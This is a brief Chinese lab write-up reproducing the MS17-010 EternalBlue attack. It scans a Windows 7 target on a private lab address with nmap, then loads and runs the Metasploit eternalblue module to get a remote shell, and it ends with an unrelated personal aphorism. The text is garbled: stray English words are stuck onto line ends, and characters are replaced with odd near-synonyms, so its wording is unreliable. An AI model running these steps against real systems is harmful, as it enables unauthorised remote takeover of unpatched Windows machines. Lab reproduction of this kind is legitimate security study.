MS17-010漏洞利用复现shell
win7靶机 IP地址:172.16.15.118 Kali攻击机 IP地址:172.16.15.50
首先咱们须要查看一下靶机是否开启445端口windows
打开kali终端,输入nmap 172.16.15.118 对靶机进行端口扫描工具
能够看到445端口是开着的ui
接下来咱们输入msfconsole命令进入Metasploit 工具加载攻击模块3d
进入工具后输入search ms17-010命令 查看可用攻击模块code
Check 参数为Yes的模块都是咱们可用使用的blog
加载攻击模块:ip
msf5 > use exploit/windows/smb/ms17_010_eternalblue
进入该模块后咱们可用使用show options 来查看咱们须要设置哪些参数it
Required 参数为Yes的都是咱们须要设置具体值的io
因为RPORT默认是445端口因此咱们不进行任何设置
设置目标ip:set rhosts 172.16.15.118
进行攻击:run命令或者exploit
等了一下子以后发现咱们已经成功获取到目标靶机的shell了
今天的复现结果挺成功
最后让我矫情一下:
没有原则的妥协 会让人觉得你没主见 没底线的原谅 会让人觉得你是非不分 别人待你如何 每每都是你本身调教出来的结果